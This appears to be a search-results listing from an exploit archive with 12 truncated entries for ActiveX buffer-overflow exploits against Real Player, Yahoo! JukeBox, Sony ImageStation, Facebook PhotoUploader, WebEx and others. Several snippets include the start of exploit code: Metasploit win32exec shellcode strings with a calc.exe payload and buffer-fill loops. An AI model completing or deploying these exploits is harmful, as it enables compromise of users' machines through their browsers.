12 matches found
Real Player - rmoc3260.dll ActiveX Control Remote Code Execution
Real Player - rmoc3260.dll ActiveX Control Remote Code Execution Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 =...
ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX BOF Exploit
No description provided by source. !-- ImageStation SonyISUpload.cab 1.0.0.38 ActiveX Buffer Overflow Exploit Vulnerability discovered by Trancek written by e.b. Tested on Windows XP SP2fully patched English, IE6 Thanks to Trancek, h.d.m. and the Metasploit crew -- html head titleImageStation...
ImageStation - SonyISUpload.cab 1.0.0.38 ActiveX Buffer Overflow
ImageStation - SonyISUpload.cab 1.0.0.38 ActiveX Buffer Overflow ImageStation SonyISUpload.cab 1.0.0.38 ActiveX Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 =...
FaceBook PhotoUploader (ImageUploader4.ocx 4.5.57.0) BOF Exploit
No description provided by source. !-- FaceBook PhotoUploader Buffer Overflow Exploit written by e.b. Tested on Windows XP SP2fully patched English, IE6, ImageUploader4.ocx 4.5.57.0FaceBookPhotoUploader2.cab The following controls are also vulnerable: Aurigma ImageUploader4 4.5.70.0 and 4.5.126.0...
yahoomusic-overflow4.txt
Yahoo! JukeBox datagrid.dll AddButton Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +...
yahoomusic-overflow2.txt
Yahoo! JukeBox MediaGrid ActiveX Control mediagrid.dll AddBitmap Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +...
Yahoo! Music JukeBox 2.2 - AddButton() ActiveX Remote Buffer Overflow
Yahoo! Music JukeBox 2.2 - AddButton ActiveX Remote Buffer Overflow Yahoo! JukeBox datagrid.dll AddButton Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 =...
Lycos FileUploader Control ActiveX Remote Buffer Overflow Exploit
No description provided by source. !-- Lycos FileUploader Control Buffer Overflow Exploit written by e.b. Note: If IE doesn't crash, the shellcode will get executed when IE is closed. Tested on Windows XP SP2fully patched English, IE6, FileUploader.dll version 2.0.0.2...
Move Networks Quantum Streaming Player SEH Overwrite Exploit
No description provided by source. !-- Move Networks Quantum Streaming Player SEH Overwrite Exploit Vulnerability discovered by Parvez Anwar, CVE-2007-4722 Exploit written by e.b. Shellcode is limited to around 400 bytes Tested on Windows XP SP2fully patched English, IE6 Thanks to h.d.m. and the...
Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit
Exploit for unknown platform in category remote exploits ================================================================= Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit ================================================================= Vantage Linguistics AnswerWorks 4 API...
Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow
Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow Exploit function Check var buf = 'A'; while buf.length = 214 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378...
[Full-disclosure] WebEx GPCContainer Memory Access Violation
There is a memory access violation in the InitParam and SetParam functions. PoC as follows: --------------------- !-- Written by e.b. -- html head script language="JavaScript" DEFER function Check var obj = new ActiveXObject"GpcContainer.GpcContainer.1"; obj.InitOaram"A"; /script /head body...